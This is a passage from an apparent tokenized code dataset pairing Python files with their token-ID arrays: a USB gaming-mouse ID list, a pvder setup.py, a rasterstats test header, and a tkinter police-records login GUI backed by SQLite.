('09da', '7b22'), # A4 Tech Co., Ltd Bloody V5
('09da', '7f2d'), # A4 Tech Co., Ltd Bloody R3 mouse
('09da', '8090'), # A4 Tech Co., Ltd X-718BK Oscar Optical Gaming Mouse
('09da', '9033'), # A4 Tech Co., X7 X-705K
('09da', '9066'), # A4 Tech Co., Sharkoon Fireglider Optical
('09da', '9090'), # A4 Tech Co., Ltd XL-730K / XL-750BK / XL-755BK Laser Mouse
('09da', '90c0'), # A4 Tech Co., Ltd X7 G800V keyboard
('09da', 'f012'), # A4 Tech Co., Ltd Bloody V7 mouse
('09da', 'f32a'), # A4 Tech Co., Ltd Bloody B540 keyboard
('09da', 'f613'), # A4 Tech Co., Ltd Bloody V2 mouse
('09da', 'f624'), # A4 Tech Co., Ltd Bloody B120 Keyboard
('1b1c', '1b3c'), # Corsair Harpoon RGB gaming mouse
('1d57', 'ad03'), # [T3] 2.4GHz and IR Air Mouse Remote Control
('1e7d', '2e4a'), # Roccat Tyon Mouse
('20a0', '422d'), # Winkeyless.kr Keyboards
('2516', '001f'), # Cooler Master Storm Mizar Mouse
('2516', '0028'), # Cooler Master Storm Alcor Mouse
]
if __name__ == '__main__':
main()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
11748,
28686,
13,
6978,
198,
11748,
2420,
37150,
198,
198,
2,
7343,
286,
12777,
2374,
19203,
312,
53,
18738,
3256,
705,
312,
15667,
33809,
355,
1440,
17910,
671,
66,
4402,
19561,
13,
198,
39345,
34444,
796,
685,
198,
220,
220,
220,
1303,
5413,
5413,
24365,
49593,
27850,
7461,
362,
13,
940,
198,
220,
220,
220,
1303,
5413,
24365,
27850,
532,
45769,
5061,
198,
220,
220,
220,
19203,
40350,
68,
3256,
705,
28694,
67,
33809,
628,
220,
220,
220,
1303,
5413,
5413,
7461,
10231,
6343,
1041,
31973,
198,
220,
220,
220,
1303,
5413,
11421,
13,
10231,
6343,
1041,
31973,
198,
220,
220,
220,
19203,
40350,
68,
3256,
705,
405,
65,
15,
33809,
628,
220,
220,
220,
1303,
5413,
5413,
7461,
10231,
6343,
31973,
198,
220,
220,
220,
1303,
5413,
11421,
13,
10231,
6343,
31973,
352,
13,
15,
32,
198,
220,
220,
220,
19203,
40350,
68,
3256,
705,
405,
65,
19,
33809,
628,
220,
220,
220,
1303,
5413,
5413,
7461,
10231,
6343,
31973,
20343,
198,
220,
220,
220,
19203,
40350,
68,
3256,
705,
2998,
1270,
33809,
628,
220,
220,
220,
1303,
5413,
5413,
7461,
362,
13,
19,
23741,
3602,
39729,
410,
21,
13,
15,
198,
220,
220,
220,
1303,
5413,
5413,
7461,
362,
13,
19,
23741,
3602,
39729,
410,
23,
13,
15,
198,
220,
220,
220,
1303,
5413,
11421,
13,
33504,
3602,
39729,
410,
16,
13,
15,
329,
19263,
198,
220,
220,
220,
1303,
5413,
24365,
12173,
21839,
8576,
198,
220,
220,
220,
1303,
5413,
24365,
27850,
20343,
198,
220,
220,
220,
19203,
40350,
68,
3256,
705,
2998,
2231,
33809,
628,
220,
220,
220,
1303,
5413,
7461,
12075,
54,
5540,
7,
15972,
8,
362,
13,
19,
23741,
3602,
39729,
198,
220,
220,
220,
19203,
40350,
68,
3256,
705,
2998,
2780,
33809,
628,
220,
220,
220,
1303,
5413,
11421,
13,
39721,
31973,
10053,
198,
220,
220,
220,
19203,
40350,
68,
3256,
705,
2998,
1120,
33809,
628,
220,
220,
220,
1303,
5413,
11421,
13,
15686,
413,
5540,
1395,
19,
10586,
198,
220,
220,
220,
19203,
40350,
68,
3256,
705,
2998,
3104,
33809,
628,
220,
220,
220,
1303,
5413,
11421,
13,
10173,
15957,
21839,
3602,
39729,
198,
220,
220,
220,
19203,
40350,
68,
3256,
705,
2998,
4790,
33809,
628,
220,
220,
220,
1303,
5413,
7461,
362,
13,
19,
23741,
3602,
39729,
410,
24,
13,
15,
198,
220,
220,
220,
1303,
5413,
7461,
33504,
3602,
39729,
410,
17,
13,
16,
198,
220,
220,
220,
1303,
5413,
1446,
13327,
5256,
70,
40036,
31973,
357,
20,
42,
53,
12,
2388,
16,
8,
198,
220,
220,
220,
19203,
40350,
68,
3256,
705,
2998,
64,
20,
33809,
628,
220,
220,
220,
1303,
5413,
7461,
33504,
3602,
39729,
410,
16,
13,
15,
198,
220,
220,
220,
1303,
5413,
24365,
31973,
10460,
198,
220,
220,
220,
19203,
40350,
68,
3256,
705,
2998,
65,
17,
33809,
628,
220,
220,
220,
1303,
5413,
7461,
33504,
3602,
39729,
410,
17,
13,
15,
198,
220,
220,
220,
19203,
40350,
68,
3256,
705,
2919,
405,
33809,
628,
220,
220,
220,
19203,
45438,
67,
3256,
705,
66,
1270,
64,
33809,
220,
1303,
5972,
45396,
11,
3457,
13,
4748,
7673,
49355,
885,
3526,
628,
220,
220,
220,
19203,
3023,
67,
24,
3256,
705,
64,
15,
7568,
33809,
220,
1303,
33516,
42271,
21839,
357,
36,
12,
11712,
282,
8450,
14426,
21839,
8,
628,
220,
220,
220,
1303,
7343,
286,
370,
330,
296,
4410,
379,
25,
2638,
1378,
23289,
86,
330,
296,
13,
10459,
30293,
13,
3262,
14,
15466,
14,
9630,
13,
10121,
14,
24728,
62,
47954,
198,
220,
220,
220,
19203,
2713,
21,
64,
3256,
705,
37187,
33809,
220,
1303,
370,
330,
296,
12152,
12,
15,
26598,
29681,
557,
198,
220,
220,
220,
19203,
2713,
21,
64,
3256,
705,
405,
1157,
33809,
220,
1303,
370,
330,
296,
12152,
12,
15,
26598,
32,
29681,
557,
17,
357,
19,
87,
20,
8,
198,
220,
220,
220,
19203,
2713,
21,
64,
3256,
705,
405,
1065,
33809,
220,
1303,
370,
330,
296,
12152,
12,
28669,
22,
32,
29681,
557,
17,
357,
20,
87,
22,
8,
198,
220,
220,
220,
19203,
2713,
21,
64,
3256,
705,
405,
1485,
33809,
220,
1303,
370,
330,
296,
327,
9328,
12,
31794,
29681,
557,
18,
357,
19,
87,
20,
8,
198,
220,
220,
220,
19203,
2713,
21,
64,
3256,
705,
405,
1415,
33809,
220,
1303,
370,
330,
296,
327,
9328,
12,
30005,
29681,
557,
18,
357,
21,
87,
23,
8,
198,
220,
220,
220,
19203,
2713,
21,
64,
3256,
705,
405,
1314,
33809,
220,
1303,
370,
330,
296,
327,
9328,
12,
25644,
29681,
557,
19,
357,
19,
87,
20,
8,
198,
220,
220,
220,
19203,
2713,
21,
64,
3256,
705,
405,
1433,
33809,
220,
1303,
370,
330,
296,
327,
9328,
12,
31102,
29681,
557,
19,
357,
21,
87,
23,
8,
198,
220,
220,
220,
19203,
2713,
21,
64,
3256,
705,
405,
1558,
33809,
220,
1303,
370,
330,
296,
327,
9328,
12,
17885,
347,
27708,
11138,
357,
19,
87,
20,
8,
198,
220,
220,
220,
19203,
2713,
21,
64,
3256,
705,
405,
1507,
33809,
220,
1303,
370,
330,
296,
327,
9328,
12,
17544,
347,
27708,
11138,
718,
87,
23,
198,
220,
220,
220,
19203,
2713,
21,
64,
3256,
705,
405,
1129,
33809,
220,
1303,
370,
330,
296,
327,
9328,
12,
21,
3132,
347,
27708,
1881,
198,
220,
220,
220,
19203,
2713,
21,
64,
3256,
705,
405,
67,
16,
33809,
220,
1303,
370,
330,
296,
347,
27708,
7507,
290,
15957,
327,
4221,
12,
34716,
198,
220,
220,
220,
19203,
2713,
21,
64,
3256,
705,
39101,
68,
33809,
220,
1303,
370,
330,
296,
2558,
84,
418,
7507,
357,
50,
8,
327,
14990,
12,
22148,
628,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
2713,
19,
69,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
402,
22,
19683,
10211,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
1415,
940,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
30893,
8355,
24,
10211,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
1270,
3559,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
30893,
371,
23,
32,
14426,
21839,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
3132,
65,
20,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
30893,
24811,
1795,
41830,
23222,
14426,
21839,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
28771,
22,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
30893,
11923,
22,
41830,
24365,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
18,
69,
23,
65,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
30893,
569,
23,
10211,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
4349,
69,
19,
33809,
220,
1303,
3401,
721,
296,
13122,
12,
4059,
21,
31973,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
2816,
4531,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
41830,
24811,
24,
23222,
14426,
21839,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
22,
65,
1828,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
30893,
569,
20,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
22,
69,
17,
67,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
30893,
371,
18,
10211,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
1795,
3829,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
1395,
12,
45720,
33,
42,
15694,
49593,
14426,
21839,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
3829,
2091,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
1395,
22,
1395,
12,
34801,
42,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
3829,
2791,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
28616,
2049,
3764,
4743,
1304,
49593,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
24,
42534,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
16276,
12,
43916,
42,
1220,
16276,
12,
15426,
33,
42,
1220,
16276,
12,
38172,
33,
42,
23222,
21839,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
3829,
66,
15,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
1395,
22,
402,
7410,
53,
10586,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
69,
30206,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
30893,
569,
22,
10211,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
69,
2624,
64,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
30893,
347,
35005,
10586,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
69,
47512,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
30893,
569,
17,
10211,
198,
220,
220,
220,
19203,
2931,
6814,
3256,
705,
69,
21,
1731,
33809,
220,
1303,
317,
19,
9634,
1766,
1539,
12052,
30893,
347,
10232,
31973,
628,
220,
220,
220,
19203,
16,
65,
16,
66,
3256,
705,
16,
65,
18,
66,
33809,
220,
1303,
47345,
2113,
26743,
25228,
7776,
10211,
628,
220,
220,
220,
19203,
16,
67,
3553,
3256,
705,
324,
3070,
33809,
220,
1303,
685,
51,
18,
60,
362,
13,
19,
23741,
290,
14826,
3701,
21839,
21520,
6779,
628,
220,
220,
220,
19203,
16,
68,
22,
67,
3256,
705,
17,
68,
19,
64,
33809,
220,
1303,
13545,
9246,
7039,
261,
21839,
628,
220,
220,
220,
19203,
1238,
64,
15,
3256,
705,
44361,
67,
33809,
220,
1303,
7178,
2539,
1203,
13,
38584,
7383,
12821,
628,
220,
220,
220,
19203,
1495,
1433,
3256,
705,
8298,
69,
33809,
220,
1303,
15226,
263,
5599,
8865,
29975,
283,
21839,
198,
220,
220,
220,
19203,
1495,
1433,
3256,
705,
405,
2078,
33809,
220,
1303,
15226,
263,
5599,
8865,
978,
10215,
21839,
198,
60,
628,
628,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1388,
3419,
198
] | 2.474214 | 1,590 |
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from autorest.jsonrpc.localapi import LocalAutorestAPI
| [
2,
16529,
45537,
198,
2,
15069,
357,
66,
8,
5413,
10501,
13,
1439,
2489,
10395,
13,
198,
2,
49962,
739,
262,
17168,
13789,
13,
4091,
13789,
13,
14116,
287,
262,
1628,
6808,
329,
198,
2,
5964,
1321,
13,
198,
2,
16529,
35937,
198,
6738,
1960,
26522,
13,
17752,
81,
14751,
13,
12001,
15042,
1330,
10714,
16541,
26522,
17614,
198
] | 6.186441 | 59 |
import os
from setuptools import setup
# The text of the README file
f=open(os.path.join(os.path.dirname(os.path.abspath(__file__)),'README.md'))
README=f.read()
f.close()
setup(name='pvder',
version=open("pvder/_version.py").readlines()[-1].split()[-1].strip("\"'"),
packages=['pvder',],
include_package_data=True,
description='Utility for simulating PV-DER',
long_description=README,
long_description_content_type="text/markdown",
url ='https://github.com/tdcosim/SolarPV-DER-simulation-tool',
author = 'Siby Jose Plathottam',
author_email='[email protected]',
license= 'LICENSE.txt',
classifiers=[
'License :: OSI Approved :: BSD License',
'Intended Audience :: Science/Research',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
],
install_requires=['scipy>=1.0.0','numpy>=1.15.1','matplotlib>=2.0.2'],#And any other dependencies required
extras_require={"docs": ['sphinx-rtd-theme','nbsphinx','nbsphinx-link'],
"numba":['numba>=0.53.0']}
)
| [
11748,
28686,
198,
6738,
900,
37623,
10141,
1330,
9058,
198,
198,
2,
383,
2420,
286,
262,
20832,
11682,
2393,
198,
69,
28,
9654,
7,
418,
13,
6978,
13,
22179,
7,
418,
13,
6978,
13,
15908,
3672,
7,
418,
13,
6978,
13,
397,
2777,
776,
7,
834,
7753,
834,
36911,
6,
15675,
11682,
13,
9132,
6,
4008,
198,
15675,
11682,
28,
69,
13,
961,
3419,
198,
69,
13,
19836,
3419,
198,
198,
40406,
7,
3672,
11639,
79,
85,
1082,
3256,
198,
220,
220,
220,
220,
220,
2196,
28,
9654,
7203,
79,
85,
1082,
47835,
9641,
13,
9078,
11074,
961,
6615,
3419,
58,
12,
16,
4083,
35312,
3419,
58,
12,
16,
4083,
36311,
7203,
7879,
6,
12340,
198,
220,
220,
220,
220,
220,
10392,
28,
17816,
79,
85,
1082,
3256,
4357,
198,
220,
220,
220,
220,
220,
2291,
62,
26495,
62,
7890,
28,
17821,
11,
198,
220,
220,
220,
220,
220,
6764,
11639,
18274,
879,
329,
985,
8306,
31392,
12,
14418,
3256,
198,
220,
220,
220,
220,
220,
890,
62,
11213,
28,
15675,
11682,
11,
198,
220,
220,
220,
220,
220,
890,
62,
11213,
62,
11299,
62,
4906,
2625,
5239,
14,
4102,
2902,
1600,
198,
220,
220,
220,
220,
220,
19016,
796,
6,
5450,
1378,
12567,
13,
785,
14,
8671,
6966,
320,
14,
38825,
47,
53,
12,
14418,
12,
14323,
1741,
12,
25981,
3256,
198,
220,
220,
220,
220,
220,
1772,
796,
705,
50,
571,
88,
5264,
1345,
776,
1252,
321,
3256,
198,
220,
220,
220,
220,
220,
1772,
62,
12888,
11639,
82,
571,
88,
19650,
27333,
303,
31,
14816,
13,
785,
3256,
198,
220,
220,
220,
220,
220,
5964,
28,
705,
43,
2149,
24290,
13,
14116,
3256,
198,
220,
220,
220,
220,
220,
1398,
13350,
41888,
198,
220,
220,
220,
220,
220,
220,
220,
705,
34156,
7904,
7294,
40,
20010,
1079,
7904,
347,
10305,
13789,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
5317,
1631,
7591,
1240,
7904,
5800,
14,
25104,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
15167,
2229,
15417,
7904,
11361,
7904,
362,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
15167,
2229,
15417,
7904,
11361,
7904,
362,
13,
22,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
15167,
2229,
15417,
7904,
11361,
7904,
513,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
15167,
2229,
15417,
7904,
11361,
7904,
513,
13,
22,
3256,
198,
220,
220,
220,
220,
220,
16589,
198,
220,
220,
220,
220,
220,
2721,
62,
47911,
28,
17816,
1416,
541,
88,
29,
28,
16,
13,
15,
13,
15,
41707,
77,
32152,
29,
28,
16,
13,
1314,
13,
16,
41707,
6759,
29487,
8019,
29,
28,
17,
13,
15,
13,
17,
6,
4357,
2,
1870,
597,
584,
20086,
2672,
198,
220,
220,
220,
220,
220,
33849,
62,
46115,
28,
4895,
31628,
1298,
37250,
82,
746,
28413,
12,
81,
8671,
12,
43810,
41707,
77,
1443,
746,
28413,
41707,
77,
1443,
746,
28413,
12,
8726,
6,
4357,
198,
197,
197,
197,
197,
197,
220,
366,
77,
2178,
64,
1298,
17816,
77,
2178,
64,
29,
28,
15,
13,
4310,
13,
15,
20520,
92,
198,
220,
220,
220,
220,
220,
1267,
198
] | 2.320537 | 521 |
# test zonal stats
import os
import pytest
from osgeo import ogr
from rasterstats import raster_stats, stats_to_csv, RasterStatsError
from rasterstats.main import VALID_STATS
from rasterstats.utils import shapely_to_ogr_type, parse_geo, get_ogr_ds, \
OGRError, feature_to_geojson, bbox_to_pixel_offsets
from shapely.geometry import shape, box
import json
DATA = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
raster = os.path.join(DATA, 'slope.tif')
### Different geometry types
# Test multigeoms
## Geo interface
import shapefile
## Categorical
## Utils
| [
2,
1332,
1976,
20996,
9756,
198,
11748,
28686,
198,
11748,
12972,
9288,
198,
6738,
28686,
469,
78,
1330,
267,
2164,
198,
6738,
374,
1603,
34242,
1330,
374,
1603,
62,
34242,
11,
9756,
62,
1462,
62,
40664,
11,
371,
1603,
29668,
12331,
198,
6738,
374,
1603,
34242,
13,
12417,
1330,
26173,
2389,
62,
2257,
33586,
198,
6738,
374,
1603,
34242,
13,
26791,
1330,
5485,
306,
62,
1462,
62,
519,
81,
62,
4906,
11,
21136,
62,
469,
78,
11,
651,
62,
519,
81,
62,
9310,
11,
3467,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
440,
28934,
81,
1472,
11,
3895,
62,
1462,
62,
469,
13210,
1559,
11,
275,
3524,
62,
1462,
62,
32515,
62,
8210,
1039,
198,
6738,
5485,
306,
13,
469,
15748,
1330,
5485,
11,
3091,
198,
11748,
33918,
198,
198,
26947,
796,
28686,
13,
6978,
13,
22179,
7,
418,
13,
6978,
13,
15908,
3672,
7,
418,
13,
6978,
13,
397,
2777,
776,
7,
834,
7753,
834,
36911,
366,
7890,
4943,
198,
81,
1603,
796,
28686,
13,
6978,
13,
22179,
7,
26947,
11,
705,
6649,
3008,
13,
49929,
11537,
198,
198,
21017,
20615,
22939,
3858,
198,
198,
2,
6208,
1963,
10045,
3150,
198,
198,
2235,
32960,
7071,
198,
11748,
5485,
7753,
198,
198,
2235,
327,
2397,
12409,
628,
198,
2235,
7273,
4487,
198
] | 2.595745 | 235 |
from tkinter import *
import tkinter as tk
import tkinter.messagebox
import tkinter.font as tkFont
from PIL import Image,ImageTk
import os
import sqlite3
import datetime
from civilian_home import civ_home
from acp_home import acp_home
from constable_home import const_home
from sys_home import system_home
connection = sqlite3.connect('NCD.db')
cursor = connection.cursor()
xtr=str(datetime.datetime.now())
cursor.execute('CREATE TABLE IF NOT EXISTS POLICE(POLICEID TEXT PRIMARY KEY CHECK(POLICEID <> ""), PASSWORD TEXT NOT NULL CHECK(PASSWORD <> ""),FNAME TEXT NOT NULL CHECK(FNAME <> ""), MNAME TEXT, LNAME TEXT NOT NULL CHECK(LNAME <> ""), PHOTO BLOB NOT NULL, LASTLOGIN TEXT, EMAILID TEXT NOT NULL CHECK(EMAILID <> ""), JURISDICTION TEXT NOT NULL CHECK(JURISDICTION <> ""), ADDRESS TEXT NOT NULL CHECK(ADDRESS <> ""), GENDER TEXT NOT NULL CHECK(GENDER <> ""), DOB TEXT NOT NULL CHECK(DOB <> ""), BATCH TEXT NOT NULL CHECK(BATCH <> ""), RANK TEXT NOT NULL CHECK(RANK <> ""), MARITALSTATUS TEXT NOT NULL)')
cursor.execute("""CREATE TABLE IF NOT EXISTS POLICE1(POLICEID TEXT, CONTACT TEXT NOT NULL, FOREIGN KEY (POLICEID) REFERENCES POLICE(POLICEID))""")
cursor.execute("""CREATE TABLE IF NOT EXISTS COMPLAINT (COMPLAINT_NO text PRIMARY KEY, PLACEOFCRIME text NOT NULL CHECK(PLACEOFCRIME <> ''), TIMEOFCRIME text, CRIMEDESCRIPTION text, CITY text, POLICESTATION text, STATUS text, VFNAME text, VMNAME text, VLNAME text, AFNAME text, AMNAME text, ALNAME text, USERID text, FOREIGN KEY(USERID) REFERENCES CIVILIAN1(USERID))""")
cursor.execute("""CREATE TABLE IF NOT EXISTS CIVILIAN1 (USERID text PRIMARY KEY CHECK(USERID <> ''), PASSWORD text NOT NULL CHECK(PASSWORD <> ''), FNAME text, MNAME text, LNAME text, DOB text, GENDER text, MARITALSTATUS text, EMAILID text NOT NULL, OCCUPATION text, ADDRESS text, LASTLOGIN text, PHOTO blob)""")
cursor.execute('CREATE TABLE IF NOT EXISTS CIVILIAN2 (USERID text , CONTACT number,FOREIGN KEY (USERID) REFERENCES CIVILIAN1(USERID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL(CRIMINALID number PRIMARY KEY, FNAME text, MNAME text, LNAME text, DOB text, BLOODGROUP text, STATUS text, PRIORITY number, GENDER text, PHOTO BLOB NOT NULL)')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE1 (CASENO number PRIMARY KEY, PENALCODETYPE text, SECTIONNUMBER number, POLICESTATION text, DESCRIPTION text NOT NULL, OPENDATE text NOT NULL, CLOSEDATE text, COMPLAINT_NO TEXT, FOREIGN KEY (COMPLAINT_NO) REFERENCES COMPLAINT(COMPLAINT_NO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL3 (CRIMINALID text, CONTACT text, FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE2(CASENO number, POLICEID text, FOREIGN KEY (POLICEID) REFERENCES POLICE(POLICEID), FOREIGN KEY(CASENO) REFERENCES CASE1(CASENO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE3(CASENO number , VFNAME text, VMNAME text, VLNAME text, VAGE number, VADDRESS text, FOREIGN KEY (CASENO) REFERENCES CASE1(CASENO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE4(CASENO number, FIRNO number, FOREIGN KEY(CASENO) REFERENCES CASE1(CASENO), FOREIGN KEY(FIRNO) REFERENCES CRIME(FIRNO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL2(CRIMINALID text, ADDRESS text, FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL1 (CRIMINALID text, IDENTIFICATIONMARKS text,FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIME2 (FIRNO number, CRIMINALID number, FOREIGN KEY(FIRNO) REFERENCES CRIME(FIRNO), FOREIGN KEY(CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIME3 (FIRNO number, PENALCODETYPE text, SECTIONNUMBER number, FOREIGN KEY (FIRNO) REFERENCES CRIME(FIRNO))')
cursor.execute( 'CREATE TABLE IF NOT EXISTS CRIME(FIRNO number PRIMARY KEY, DAMAGEAMOUNT number, INJURED number, DEATHS number, DATEOFCRIME text NOT NULL, PLACEOFCRIME text)')
connection.commit()
t=tk.Tk()
t.title('NCDS')
t.configure(background = 'white')
#t.geometry("1500x800+30+30")
w, h = t.winfo_screenwidth(), t.winfo_screenheight()
t.geometry("%dx%d+0+0" % (w, h))
#fontStyle = tkFont.Font(family="Times New Roman", size=60)
OptionList=['Police','Civilian']
v = tk.StringVar(t)
v.set('Select User Type'.upper())
opt = tk.OptionMenu(t, v, *OptionList)
fing=tkFont.Font(family="Times New Roman", size=16)
opt.configure(relief="solid",font=tkFont.Font(family="Times New Roman", size=20))
impmsg=Label(t, text='WELCOME TO POLICE PORTAL',bg='black', fg='white',font=tkFont.Font(family="Times New Roman", size=60), borderwidth=2, relief="solid")
wanted=Label(t, text='T O P W A N T E D', fg='red',font=tkFont.Font(family="Times New Roman", size=40), borderwidth=2, relief="solid")
detail=Label(t, text='Enter Below details to Login',bg='white',fg='black',font=tkFont.Font(family="Times New Roman", size=20), borderwidth=2, relief="solid")
user=Label(t, text='USER ID ',font=fing,borderwidth=2, relief="solid")
password=Label(t, text='PASSWORD',font=fing, borderwidth=2,relief="solid")
uid=Entry(t,font=tkFont.Font(family="Times New Roman", size=30), borderwidth=2, relief="solid")
pswd=Entry(t,show='*',font=tkFont.Font(family="Times New Roman", size=30), borderwidth=2, relief="solid")
submit=Button(t, text='SUBMIT', command=enter,font=fing, borderwidth=2, relief="solid")
reset=Button(t, text='CLEAR', command=clear,font=fing, borderwidth=2, relief="solid")
signup=Button(t, text='REGISTER', command=register, borderwidth=2, relief="solid")
close=Button(t, text='EXIT', command=close, font=fing,borderwidth=2, relief="solid")
signup.configure(font=("Times New Roman",25,'bold'))
f=cursor.execute('SELECT PHOTO from CRIMINAL order by priority')
temp=f.fetchall()
plist=[]
if len(temp)>=6:
for i in range(6):
path = "z" + str(i) + '.jpg'
with open(path, 'wb') as file:
file.write(temp[i][0])
plist.append(path)
else:
for i in range(len(temp)):
path = "z" + str(i) + '.jpg'
with open(path, 'wb') as file:
file.write(temp[i][0])
plist.append(path)
for i in range (len(temp)-1,6):
plist.append('demo.jpg')
t.load1 = Image.open(plist[0])
t.load1 = t.load1.resize((200, 200), Image.ANTIALIAS)
t.photo1 = ImageTk.PhotoImage(t.load1, master=t)
t.img1 = Label(t, image=t.photo1, borderwidth=2, relief="solid")
t.img1.image = t.photo1
t.load2 = Image.open(plist[1])
t.load2 = t.load2.resize((200, 200), Image.ANTIALIAS)
t.photo2 = ImageTk.PhotoImage(t.load2, master=t)
t.img2 = Label(t, image=t.photo2, borderwidth=2, relief="solid")
t.img2.image = t.photo2
t.load3 = Image.open(plist[2])
t.load3 = t.load3.resize((200, 200), Image.ANTIALIAS)
t.photo3 = ImageTk.PhotoImage(t.load3, master=t)
t.img3 = Label(t, image=t.photo3, borderwidth=2, relief="solid")
t.img3.image = t.photo3
t.load4 = Image.open(plist[3])
t.load4 = t.load4.resize((200, 200), Image.ANTIALIAS)
t.photo4 = ImageTk.PhotoImage(t.load4, master=t)
t.img4 = Label(t, image=t.photo4, borderwidth=2, relief="solid")
t.img4.image = t.photo4
t.load5 = Image.open(plist[4])
t.load5 = t.load5.resize((200, 200), Image.ANTIALIAS)
t.photo5 = ImageTk.PhotoImage(t.load5, master=t)
t.img5 = Label(t, image=t.photo5, borderwidth=2, relief="solid")
t.img5.image = t.photo5
t.load6 = Image.open(plist[5])
t.load6 = t.load6.resize((200, 200), Image.ANTIALIAS)
t.photo6 = ImageTk.PhotoImage(t.load6, master=t)
t.img6 = Label(t, image=t.photo6, borderwidth=2, relief="solid")
t.img6.image = t.photo6
impmsg.place(x=0, y=5, width=w, height=100)
wanted.place(x=600, y=160, width=800, height=70)
detail.place(x=90 , y=200, width=410, height=75)
opt.place(x = 90, y = 300 , width=410, height=70)
user.place(x = 90, y = 380 , width=200, height=70)
uid.place(x = 300, y = 380 , width=200, height=70)
password.place(x = 90, y = 460 , width=200, height=70)
pswd.place(x = 300, y = 460 , width=200, height=70)
submit.place(x = 90, y = 540, width=200, height=70)
reset.place(x = 300, y = 540 , width=200, height=70)
signup.place(x= 90, y = 630, width = 200, height = 70)
close.place(x= 300, y = 630, width = 200, height = 70)
t.img1.place(x = 600, y = 250 , width=200, height=200)
t.img2.place(x = 900, y = 250 , width=200, height=200)
t.img3.place(x = 1200, y = 250 , width=200, height=200)
t.img4.place(x = 600, y = 500 , width=200, height=200)
t.img5.place(x = 900, y = 500 , width=200, height=200)
t.img6.place(x = 1200, y = 500 , width=200, height=200)
mainloop()
| [
6738,
256,
74,
3849,
1330,
1635,
201,
198,
11748,
256,
74,
3849,
355,
256,
74,
201,
198,
11748,
256,
74,
3849,
13,
20500,
3524,
201,
198,
11748,
256,
74,
3849,
13,
10331,
355,
256,
74,
23252,
201,
198,
6738,
350,
4146,
1330,
7412,
11,
5159,
51,
74,
201,
198,
11748,
28686,
201,
198,
11748,
44161,
578,
18,
201,
198,
11748,
4818,
8079,
201,
198,
6738,
11107,
62,
11195,
1330,
36317,
62,
11195,
201,
198,
6738,
936,
79,
62,
11195,
1330,
936,
79,
62,
11195,
201,
198,
6738,
1500,
540,
62,
11195,
1330,
1500,
62,
11195,
201,
198,
6738,
25064,
62,
11195,
1330,
1080,
62,
11195,
201,
198,
201,
198,
38659,
796,
44161,
578,
18,
13,
8443,
10786,
7792,
35,
13,
9945,
11537,
201,
198,
66,
21471,
796,
4637,
13,
66,
21471,
3419,
201,
198,
742,
81,
28,
2536,
7,
19608,
8079,
13,
19608,
8079,
13,
2197,
28955,
201,
198,
201,
198,
66,
21471,
13,
41049,
10786,
43387,
6158,
43679,
16876,
